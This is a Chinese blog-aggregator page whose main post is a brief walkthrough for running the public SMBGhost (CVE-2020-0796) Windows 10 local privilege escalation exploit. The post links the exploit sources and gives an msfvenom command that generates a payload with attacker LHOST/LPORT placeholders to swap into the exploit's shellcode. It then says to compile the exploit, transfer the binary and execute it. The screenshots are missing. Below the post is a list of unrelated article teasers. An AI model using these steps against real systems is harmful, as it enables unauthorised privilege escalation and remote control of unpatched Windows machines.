Windows SMBGhost CVE-2020-0796 Elevate Privileges

SMBGhost CVE-2020-0796

Microsoft Windows 10 (1903/1909) - ‘SMBGhost’ SMB3.1.1
‘SMB2_COMPRESSION_CAPABILITIES’ Local Privilege Escalation
https://www.exploit-db.com/exploits/48267

Github

https://github.com/danigargu/CVE-2020-0796

修改载荷[可选]
生成 c# 形式的Payload, 替换.cpp里的 uint8_t shellcode[] 变量的内容
msfvenom -p Payload LHOST=X.X.X.X LPORT=X -f dll -f csharp

编译漏洞
(Github的项目可直接由Visual Studio 2019 编译,Visual Studio 2022版本需要移植项目)
在这里插入图片描述

复制后的文件
$ file cve-2020-0796-local.exe
cve-2020-0796-local.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections

传输 cve-2020-0796-local.exe

执行

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/2876.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【ARMv9 DSU-120 系列 -- Mapping for address target groups to CHI bus master ports】

【ARMv9 DSU-120 系列 -- Mapping for address target groups to CHI bus master ports】

文章目录 Mapping for address target groups to CHI bus master ports映射决定过程示例CHI id bit settingMapping for address target groups to CHI bus master ports 在DSU-120(DynamIQ™共享单元-120)中,地址目标组与总线主端口之间的映射关系是通过在复位时决定哪些总…
阅读更多...
LLaMA Factory单机微调的实战教程

LLaMA Factory单机微调的实战教程

大家好,我是herosunly。985院校硕士毕业,现担任算法研究员一职,热衷于机器学习算法研究与应用。曾获得阿里云天池比赛第一名,CCF比赛第二名,科大讯飞比赛第三名。拥有多项发明专利。对机器学习和深度学习拥有自己独到的见解。曾经辅导过若干个非计算机专业的学生进入到算法…
阅读更多...
23年HVV微b蓝初面经

23年HVV微b蓝初面经

1. 自我介绍 从项目经验 工作经历 个人技术 上面三个方面说一些就行 2. 平时学习的方式是什么,有没有系统学习过安全, web 、内网学的怎么样 学的 b 站系统的课程,加了很多学习圈子、论坛,内网只涉猎了一点,学习的不…
阅读更多...
【JAVA基础之IO】字节流、字符流以及乱码问题

【JAVA基础之IO】字节流、字符流以及乱码问题

🔥作者主页:小林同学的学习笔录 🔥mysql专栏:小林同学的专栏 目录 1. IO概述 1.1 什么是IO 1.2 IO的分类 1.3 字节和字符流的顶级父类 2. 字节流 2.1 一切皆为字节 2.2 字节输出流【OutputStream】 2.3 FileOutputStream类…
阅读更多...
【GUI软件】小红书关键词搜索结果批量采集

【GUI软件】小红书关键词搜索结果批量采集

一、背景介绍 1.1 爬取目标 用python开发的爬虫采集软件,可自动按关键词抓取小红书笔记。 软件界面截图: 爬取结果截图: 结果截图1: 结果截图2: 结果截图3: 以上。 1.2 演示视频 软件运行演示: 【软件演示】小红书搜…
阅读更多...
零信任网络安全技术雷达图3.0正式发布

零信任网络安全技术雷达图3.0正式发布

伴随零信任理念的发展和实施,零信任技术体系的演进变革也日趋完善。易安联力图通过持续更新并优化零信任雷达图,以反映零信任技术在应对新型网络安全挑战中的创新和发展,为企业和组织提供前瞻性的技术建议,助力其构建更为强大和灵…
阅读更多...
11.泛型

11.泛型

文章目录 1 泛型概念2. 自定义泛型结构3 泛型方法4 泛型在继承上的体现5 通配符的使用 1 泛型概念 所谓泛型就是用标识符标识不确定的类型,详细说就是:定义类或接口时用标识符表示类中某个属性的类型或者是某个方法的返回值及参数类型。泛型将在使用时&a…
阅读更多...
探索React Router:实现动态二级路由

探索React Router:实现动态二级路由

我有一个路由配置的二维数组,想根据这个数组结合路由组件来动态生成路由,应该怎么样实现。在 React Router 6 中渲染二级路由的方式跟 React Router 65相比有一些变化,但核心思路仍然是利用 Route 组件和路由嵌套的方式。下面是具体的步骤: 定义路由数组…
阅读更多...
小程序视频如何下载到手机#下载高手

小程序视频如何下载到手机#下载高手

在本文中,我将向您介绍一个工具:下载高手,帮助您轻松下载小程序视频,并将其保存到您的手机中。无论是学习教育类的小程序视频,还是图片素材类的小程序,这些方法都适用于各种类型的小程序。 工具我已经打包好了&#x…
阅读更多...
蓝桥杯 — — 完全日期

蓝桥杯 — — 完全日期

完全日期 友情链接:完全日期 题目: 思路: 直接从20010101枚举到20211231,然后再判断每一个数是否是一个合法的日期,如果这个日期是合法的,接着判断这个日期的每一个位置上的数字之和是否是一个完全平方数…
阅读更多...
Qt——设置字体样式

Qt——设置字体样式

在Qt中&#xff0c;你可以通过设置字体颜色来将文本显示为灰色。你可以使用QPalette对象为特定的控件或整个应用程序的控件设置颜色。以下是一个如何将按钮字体设置为灰色的示例&#xff1a; #include <QApplication> #include <QWidget> #include <QPushButto…
阅读更多...
GPT-SoVITS声音克隆训练和推理(新手教程,附整合包)

GPT-SoVITS声音克隆训练和推理(新手教程,附整合包)

环境: Win10 专业版 GPT-SoVITS-0421 整合包 问题描述: GPT-SoVITS声音克隆如何训练和推理教程 解决方案: Zero-shot TTS: Input a 5-second vocal sample and experience instant text-to-speech conversion.零样本 TTS:输入 5 秒的人声样本并体验即时文本到语音转换…
阅读更多...
基于java的CRM客户关系管理系统的设计与实现

基于java的CRM客户关系管理系统的设计与实现

本科毕业设计(论文) 题 目&#xff1a; 基于java的CRM客户关系管理系统的设计与实现 专题题目&#xff1a; 说 明 请按以下顺序编排&#xff1a; 封面任务书开题报告中外文摘要及关键词目录正文附录&…
阅读更多...
《深入浅出.NET框架设计与实现》笔记6.1——ASP.NET Core应用程序多种运行模式之一——自宿主(Self-Hosting)

《深入浅出.NET框架设计与实现》笔记6.1——ASP.NET Core应用程序多种运行模式之一——自宿主(Self-Hosting)

ASP.NET Core应用程序可以在多种运行模式下运行&#xff0c;包括自宿主&#xff08;Self-Hosting&#xff09;、IIS服务承载、桌面应用程序、服务承载。 因此选择和时的模式很重要。 自宿主&#xff08;Self-Hosting&#xff09; 自宿主是指 ASP.NET Core 应用程序独立运行&a…
阅读更多...
算法学习笔记Day9——动态规划初探

算法学习笔记Day9——动态规划初探

一、介绍 本文解决几个问题&#xff1a;动态规划是什么&#xff1f;解决动态规划问题有什么技巧&#xff1f;如何学习动态规划&#xff1f; 1. 动态规划问题的一般形式就是求最值。动态规划其实是运筹学的一种最优化方法&#xff0c;只不过在计算机问题上应用比较多&#xff…
阅读更多...
2024/4/24总结

2024/4/24总结

js进阶 作用域 作用域分为全局作用域和局部作用域 局部作用域 分为块级作用域&#xff08; 就是使用 {} 包裹起来的代码称为代码块 &#xff09;和函数作用域&#xff08; 顾名思义就是函数包裹的部分 &#xff09; let 和 const 声明的常量会产生块级作用域 var不会产生…
阅读更多...
maya显示隐藏 动画长度

maya显示隐藏 动画长度

目录 大纲视图&#xff0c;选择节点&#xff0c;H控制显示与隐藏 使用Viewport显示/隐藏 脚本控制显示/隐藏 获取动画长度python脚本 大纲视图&#xff0c;选择节点&#xff0c;H控制显示与隐藏 使用Viewport显示/隐藏 这是最直观的方法&#xff0c;适合临时隐藏Mesh以便专…
阅读更多...
矩阵连乘算法

矩阵连乘算法

矩阵连乘&#xff1a; #include<iostream> #define inf 0x7fffffff using namespace std; int a[256] { 0 };//存储矩阵的行和列 int m[256][256] { 0 };//存储i到j的最少计算次数 int s[256][256] { 0 };//存储i到j的中转站k void m_print(int i, int j) {if (i …
阅读更多...
Kubectl常见排查pod问题命令

Kubectl常见排查pod问题命令

一.查看命名空间pod及其日志 #查看命名空间pod kubectl get pods -n <命名空间名称> #该命令不加-n命名空间名称&#xff0c;默认是查看default命名空间的pod#查看对应pod的日志kubectl logs -f <pod-name> -n <namespace>#同样的如果查看的是default命名空…
阅读更多...
如何在OpenWRT上配置SFTP远程文件传输

如何在OpenWRT上配置SFTP远程文件传输

如何在OpenWRT上配置SFTP远程文件传输 OpenWRT 是一款广泛使用的开源路由器固件&#xff0c;它能够让普通的家用路由器具备高级路由功能&#xff0c;提供更多自定义和优化选项。本文将介绍如何在OpenWRT上配置SFTP&#xff08;SSH文件传输协议&#xff09;服务&#xff0c;以便…
阅读更多...
最新文章

Copyright @ 2022~2023